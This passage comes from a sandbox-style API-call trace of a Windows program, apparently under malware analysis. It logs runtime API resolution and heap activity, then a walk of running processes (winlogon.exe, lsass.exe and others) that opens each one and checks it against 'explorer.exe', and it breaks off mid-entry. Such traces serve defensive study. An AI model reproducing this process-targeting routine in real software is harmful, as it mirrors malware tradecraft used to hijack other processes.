(in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x5f0000) returned 1 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e00 | out: hHeap=0x5f0000) returned 1 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x5f0000) returned 1 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615d60 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f220 [0179.632] lstrlenA (lpString="<") returned 1 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f1a0 [0179.632] lstrcpyA (in: lpString1=0x61f1a0, lpString2="<" | out: lpString1="<") returned="<" [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f230 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f230, Size=0x11) returned 0x615c80 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.632] lstrlenA (lpString=">") returned 1 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f230 [0179.632] lstrcpyA (in: lpString1=0x61f230, lpString2=">" | out: lpString1=">") returned=">" [0179.632] lstrlenA (lpString="") returned 1 [0179.634] lstrcpyA (in: lpString1=0x61f230, lpString2=">" | out: lpString1=">") returned=">" [0179.634] lstrlenA (lpString=">") returned 4 [0179.634] lstrcpyA (in: lpString1=0x61f0c0, lpString2=">" | out: lpString1=">") returned=">" [0179.634] lstrlenA (lpString="<") returned 1 [0179.634] lstrcpyA (in: lpString1=0x61f1b0, lpString2="<" | out: lpString1="<") returned="<" [0179.634] GetProcessHeap () returned 0x5f0000 [0179.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f230 [0179.634] lstrlenA (lpString=">") returned 1 [0179.634] GetProcessHeap () returned 0x5f0000 [0179.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f100 [0179.634] lstrcpyA (in: lpString1=0x61f100, lpString2=">" | out: lpString1=">") returned=">" [0179.634] lstrlenA (lpString="") returned 1 [0179.635] lstrcpyA (in: lpString1=0x61f100, lpString2=">" | out: lpString1=">") returned=">" [0179.635] lstrlenA (lpString=">") returned 4 [0179.635] lstrcpyA (in: lpString1=0x61f160, lpString2=">" | out: lpString1=">") returned=">" [0179.635] lstrlenA (lpString="<") returned 1 [0179.635] lstrcpyA (in: lpString1=0x61f0c0, lpString2="<" | out: lpString1="<") returned="<" [0179.635] GetProcessHeap () returned 0x5f0000 [0179.635] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f1b0 [0179.635] lstrlenA (lpString="") returned 0 [0179.635] GetProcessHeap () returned 0x5f0000 [0179.635] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0c0 [0179.635] lstrcpyA (in: lpString1=0x61f0c0, lpString2="" | out: lpString1="") returned="" [0179.635] SetLastError (dwErrCode=0x0) [0179.635] GetProcessHeap () returned 0x5f0000 [0179.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615ce0 [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0179.636] GetLastError () returned 0x0 [0179.636] SetLastError (dwErrCode=0x0) [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ea0 [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615dc0, Size=0x1b) returned 0x615e40 [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0179.636] GetLastError () returned 0x0 [0179.636] SetLastError (dwErrCode=0x0) [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615fa0 [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615e80, Size=0x1b) returned 0x615d00 [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615fa0 | out: hHeap=0x5f0000) returned 1 [0179.636] GetLastError () returned 0x0 [0179.636] SetLastError (dwErrCode=0x0) [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615dc0 [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615fc0, Size=0x1a) returned 0x615fa0 [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0179.636] GetLastError () returned 0x0 [0179.636] SetLastError (dwErrCode=0x0) [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x615f80 [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f80 | out: hHeap=0x5f0000) returned 1 [0179.636] GetLastError () returned 0x0 [0179.636] SetLastError (dwErrCode=0x0) [0179.636] GetProcessHeap () returned 0x5f0000 [0179.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x615ce0 [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0179.637] GetLastError () returned 0x0 [0179.637] SetLastError (dwErrCode=0x0) [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615e00 [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615f40, Size=0x19) returned 0x615fc0 [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e00 | out: hHeap=0x5f0000) returned 1 [0179.637] GetLastError () returned 0x0 [0179.637] SetLastError (dwErrCode=0x0) [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x615f40 [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615f60, Size=0x1a) returned 0x615f80 [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5f0000) returned 1 [0179.637] GetLastError () returned 0x0 [0179.637] SetLastError (dwErrCode=0x0) [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615f60 [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0179.637] GetLastError () returned 0x0 [0179.637] SetLastError (dwErrCode=0x0) [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615d60 [0179.637] GetProcessHeap () returned 0x5f0000 [0179.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0179.637] GetLastError () returned 0x0 [0179.638] SetLastError (dwErrCode=0x0) [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x615ca0 [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60f270 | out: hHeap=0x5f0000) returned 1 [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615dc0 [0179.638] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615e80 [0179.638] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0179.638] GetProcessHeap () returned 0x5f0000 [0179.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e80 | out: hHeap=0x5f0000) returned 1 [0179.639] ResetEvent (hEvent=0x8) returned 1 [0179.639] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 93 os_tid = 0x12f4 Thread: id = 94 os_tid = 0x948 [0178.787] GetProcessHeap () returned 0x5f0000 [0178.787] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f1b0 [0178.787] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0178.787] GetProcessHeap () returned 0x5f0000 [0178.787] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0178.787] Sleep (dwMilliseconds=0x64) [0178.892] lstrlenA (lpString=" ") returned 1 [0178.892] GetProcessHeap () returned 0x5f0000 [0178.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f1a0 [0178.892] lstrcpyA (in: lpString1=0x61f1a0, lpString2=" " | out: lpString1=" ") returned=" " [0178.892] GetProcessHeap () returned 0x5f0000 [0178.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f220 [0178.892] GetProcessHeap () returned 0x5f0000 [0178.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f140 [0178.892] GetProcessHeap () returned 0x5f0000 [0178.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x615f80 [0178.892] GetProcessHeap () returned 0x5f0000 [0178.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x615f60 [0178.892] GetProcessHeap () returned 0x5f0000 [0178.892] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615f60, Size=0x37) returned 0x616d50 [0178.892] GetProcessHeap () returned 0x5f0000 [0178.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1c) returned 0x615dc0 [0178.892] GetProcessHeap () returned 0x5f0000 [0178.892] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615dc0, Size=0x39) returned 0x616f90 [0178.892] GetProcessHeap () returned 0x5f0000 [0178.893] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615ce0 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615ce0, Size=0x49) returned 0x620870 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x616f90 | out: hHeap=0x5f0000) returned 1 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x616d50 | out: hHeap=0x5f0000) returned 1 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f80 | out: hHeap=0x5f0000) returned 1 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f140 | out: hHeap=0x5f0000) returned 1 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25) returned 0x613320 [0178.893] GetProcessHeap () returned 0x5f0000 [0178.893] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f220 [0178.893] ResetEvent (hEvent=0xc) returned 1 [0178.893] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0178.917] GetProcessHeap () returned 0x5f0000 [0178.917] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0178.917] GetProcessHeap () returned 0x5f0000 [0178.917] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0178.917] Sleep (dwMilliseconds=0x1f4) [0179.435] Sleep (dwMilliseconds=0x1f4) [0179.951] GetProcessHeap () returned 0x5f0000 [0179.951] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615da0 [0179.951] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcessId") returned 0x7ffb2624b4a0 [0179.952] GetProcessHeap () returned 0x5f0000 [0179.952] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x5f0000) returned 1 [0179.952] GetCurrentProcessId () returned 0x148 [0179.952] GetProcessHeap () returned 0x5f0000 [0179.952] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615f40 [0179.952] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateToolhelp32Snapshot") returned 0x7ffb2625e800 [0179.952] GetProcessHeap () returned 0x5f0000 [0179.952] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5f0000) returned 1 [0179.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d0 [0179.971] GetProcessHeap () returned 0x5f0000 [0179.971] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f120 [0179.971] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32First") returned 0x7ffb262785d0 [0179.972] GetProcessHeap () returned 0x5f0000 [0179.972] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0179.973] Process32First (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.973] GetProcessHeap () returned 0x5f0000 [0179.973] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f1a0 [0179.973] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0179.973] GetProcessHeap () returned 0x5f0000 [0179.973] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.973] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x64, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.974] GetProcessHeap () returned 0x5f0000 [0179.974] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0c0 [0179.974] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0179.974] GetProcessHeap () returned 0x5f0000 [0179.974] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.974] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.975] GetProcessHeap () returned 0x5f0000 [0179.975] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0179.975] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0179.975] GetProcessHeap () returned 0x5f0000 [0179.975] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.975] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0179.975] GetProcessHeap () returned 0x5f0000 [0179.975] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f220 [0179.975] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0179.975] GetProcessHeap () returned 0x5f0000 [0179.975] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.975] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.976] GetProcessHeap () returned 0x5f0000 [0179.976] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0179.976] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0179.976] GetProcessHeap () returned 0x5f0000 [0179.976] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.976] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0179.976] GetProcessHeap () returned 0x5f0000 [0179.976] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f220 [0179.976] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0179.976] GetProcessHeap () returned 0x5f0000 [0179.976] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.976] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.977] GetProcessHeap () returned 0x5f0000 [0179.977] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0e0 [0179.977] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0179.977] GetProcessHeap () returned 0x5f0000 [0179.977] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0179.977] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x1c0) returned 0x0 [0179.977] GetProcessHeap () returned 0x5f0000 [0179.977] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f220 [0179.977] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0179.977] GetProcessHeap () returned 0x5f0000 [0179.977] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.977] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.978] GetProcessHeap () returned 0x5f0000 [0179.978] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f1b0 [0179.978] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0179.978] GetProcessHeap () returned 0x5f0000 [0179.978] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0179.978] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0179.978] GetProcessHeap () returned 0x5f0000 [0179.978] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f220 [0179.978] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0179.978] GetProcessHeap () returned 0x5f0000 [0179.978] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.978] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.979] GetProcessHeap () returned 0x5f0000 [0179.979] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0d0 [0179.979] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0179.979] GetProcessHeap () returned 0x5f0000 [0179.979] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0179.979] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x200) returned 0x1d4 [0179.979] GetProcessHeap () returned 0x5f0000 [0179.979] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f100 [0179.979] GetProcessHeap () returned 0x5f0000 [0179.979] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f1a0 [0179.979] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0179.979] GetProcessHeap () returned 0x5f0000 [0179.979] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.980] StrStrIA (lpFirst="winlogon.exe", lpSrch="explorer.exe") returned 0x0 [0179.985] GetProcessHeap () returned 0x5f0000 [0179.985] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0179.985] GetProcessHeap () returned 0x5f0000 [0179.985] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0e0 [0179.986] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0179.986] GetProcessHeap () returned 0x5f0000 [0179.986] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0179.986] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.986] GetProcessHeap () returned 0x5f0000 [0179.986] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0179.986] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0179.986] GetProcessHeap () returned 0x5f0000 [0179.986] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.986] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0179.986] GetProcessHeap () returned 0x5f0000 [0179.986] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f220 [0179.987] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0179.987] GetProcessHeap () returned 0x5f0000 [0179.987] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.987] Process32Next (in: hSnapshot=0x1d0, lppe=0x5cfc80 | out: lppe=0x5cfc80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.003] GetProcessHeap () returned 0x5f0000 [0180.003] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f100 [0180.003] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0180.003] GetProcessHeap () returned 0x5f0000 [0180.003] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0180.003] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x220) returned 0x1dc [0180.003] GetProcessHeap () returned 0x5f0000 [0180.003] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f0e0 [0180.003] GetProcessHeap () returned 0x5f0000 [0180.003] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f220 [0180.003] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.003] GetProcessHeap () returned 0x5f0000 [0180.003] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.003] StrStrIA (lpFirst="lsass.exe", lpSrch="explorer.exe") returned 0x0 [0180.003] GetProcessHeap () returned 0x5f0000 [0180.003] HeapFree (in: 